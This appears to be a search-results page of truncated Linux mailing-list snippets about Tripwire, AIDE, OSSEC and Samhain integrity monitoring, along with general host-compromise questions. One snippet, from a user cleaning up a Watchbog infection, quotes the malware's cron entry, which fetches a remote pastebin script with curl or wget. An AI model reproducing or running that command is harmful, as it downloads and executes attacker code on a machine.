search for: samhain

Hello all, Years ago, I used to work with tripwire for system monitoring. Last time I checked with "yum search tripwire", there is no hit. IIRC, it used to be packed by default on older Redhat distros. Any suggestion for an alternative of tripwire for my CentOS 5.6? Cheers, -- ********************************************************************** Viet Nhat General Joint Stock

...ollects syslog messages from all my servers, indexes them by server and severity, and gives a reasonable management interface. Given expressions based on facility, severity, log message, and the like, it could throw away useless messages, or page me for critical ones. This would tie into AIDE/Samhain/Tripwire (haven't picked one yet) and maybe even different flavors of IDS. It could even warn me when processes run away with the CPU or RAM, or disks get too full. I've found a variety of things that almost do this. Nagios is good at paging for service failures, disk full warnings, a...

Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than centralized and...

Hi, I literally have about 36 machines running CentOS on a private network, and will probably change the remaining 30 or so away from Whitebox or RH in the near term. One thing I just noticed was when I tried to search out Tripwire RPM's, that none seemed evident. Can anyone point me in the direction of an Tripwire RPM that works with CentOS 4.3, or advise me on how to create one from the

...with puppet in an easy way. In the majority of cases, these commands change appropriate files, which reflect the current configuration. I''d like to get them stored in a central repository where they can be compared against an expected state. I''m using file integrity checkers (samhain and bart). These just tell that the checksum of a file changed, but know nothing about the content. I''ve thought about a ''config scan'' which runs on the machine several times a day and transfers the gathered data to a central repository. Does anybody know a mechanis...

Hello guys, Whats is the best way to identify a possible user using a botnet with php in the server? And if he is using GET commands for example in other server. Does apache logs outbound conections ? If it is using a file that is not malicious the clam av would not identify. Thanks

In short, the reason considering (and still only considering) turning it off is to make tripwire usable again (security vs. performance, I guess). Is it possible to completely turn it off system-wide? Any additional steps needed on the existing system (that already have half of the binaries prelinked)? What order of performance degradation to expect? If it is minor, nobody is going to cry

...k for the first time. Planning to use PIII 550 Mhz with 256 or 512 MB Ram & 80 GB HDD. Please advise if the above configuration is ok for the application below...if not, please tell me what I need to have a comfortable system. I plan to install minimum CentOS 4.2 Server required with iptables, Samhain & Asterisk & associated programs. System will have no X/KDE/Gnome. I require an expandable system with at least two/three VoIP ports (have 256 Kbps Async Adsl) and two POTS ports (am not using FXO/FXS anology because I may confuse myself at this stage) that I will plug into the office Anal...

...ace down what ended up being a funny situation, Aide detected that /etc/hosts.deny would change timestamp but nothing else, turns out OSSEC has an active response feature to block attacks which involves updating that file to block a host for 10 minutes. You could also look into inotify options and Samhain is another HIDS (I'd love to hear about anyone's experience with it). A free variant of tripwire may still exist but is probably unsupported and Aide is a clone of it. I noticed that rootkit detection has also been mentioned in another reply. ________________________________ From: CentOS...

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

How do you know when a Linux system has been compromised?? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS

I run OS X 10.3.7 on a PowerMac MDD G4 on a cable broadband connection. I have reason to think my system has been tampered with. Security features in Mac OS X have been left unlocked (Preference Pane - Users) even though a master lock has always been set in the Security Preference Pane. This locks all other important preference panes which could be tampered with. Also permissions have been

I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), the db server have to be on different systems. In addition the auditor has also stipulated that there be a NTP server, a "patch" server, The Host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be

Starting with a fresh load and after I finish hardening the load following the Center for Internet Security (CIS) guidance, I'm wondering whether AIDE or OSSEC would be a better intrusion detection system. I installed AIDE and did a quick test of AIDE and after initializing the db and applying the recent cups update, I found that 1700+ files had changed. Those are a lot of changes to wade

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi everyone, One quick question: Is it safe and/or sensible to rename the root account, so that the only uid 0 user on a system is something different to root? I can see how this would be effective against external attackers who have no knowledge of the internals of the system as they would spend pointless hours trying to crack a user which doesnt

I am trying to write a module for tripwire. I need to push out the twcfg.txt and twpol.txt files only if the tw.cfg and tw.pol files do not currently exist. How can do I this with File{}? I''m can''t seem to find a way to do it. In general times, how can you deploy file A only when file B does not exist? And... tripwire... what a mess. I am trying to use push out the site key,

...: no attempt to resume when suspending to swapfile on dm-crypt device Added tag(s) jessie. > tags 240072 + jessie Bug #240072 {Done: Kurt Roeckx <kurt at roeckx.be>} [openssl] openssl: "engine dynamic -pre" segfaults Added tag(s) jessie. > tags 701353 + jessie Bug #701353 [src:samhain] samhain: ftbfs with GCC-4.8 Added tag(s) jessie. > tags 289084 + jessie Bug #289084 [ddclient] Debconf for ddclient does not ask for proxy Added tag(s) jessie. > tags 626718 + jessie Bug #626718 [src:xmail] xmail: FTBFS: missing -ldl Added tag(s) jessie. > tags 685015 + jessie Bug #685015...